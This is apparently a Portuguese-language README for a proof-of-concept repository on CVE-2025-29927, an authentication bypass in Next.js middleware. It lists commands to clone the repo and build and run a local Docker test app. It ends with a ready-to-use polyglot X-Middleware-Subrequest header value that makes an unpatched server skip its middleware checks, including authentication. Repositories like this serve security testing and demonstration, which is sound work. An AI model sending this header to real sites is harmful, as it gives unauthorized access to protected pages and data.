
PoC para CVE-2025-29927: Vulnerabilidade de Bypass de Middleware do Next.js. Demonstra como x-middleware-subrequest pode contornar verificações de autenticação. Inclui configuração Docker para testes.
Este repositório demonstra a vulnerabilidade CVE-2025-29927 no Next.js, onde o cabeçalho interno x-middleware-subrequest pode ser usado para contornar verificações de middleware, como autenticação.
git clone https://github.com/alihussainzada/CVE-2025-29927-PoC.git
cd CVE-2025-29927-PoC
openssl rand -base64 32
.env:NEXTAUTH_SECRET=your_generated_secret
docker build -t nextjs .
docker run -p 3000:3000 --env-file .env nextjs
Podemos simplificar bastante a exploração desse problema usando um poliglota que nos permite cobrir efetivamente os vários casos potenciais. Conseguimos isso com o seguinte cabeçalho HTTP, usado para verificar a presença de um bypass de autenticação:
X-Middleware-Subrequest: src/middleware:nowaf:src/middleware:src/middleware:src/middleware:src/middleware:middleware:middleware:nowaf:middleware:middleware:middleware:pages/_middleware

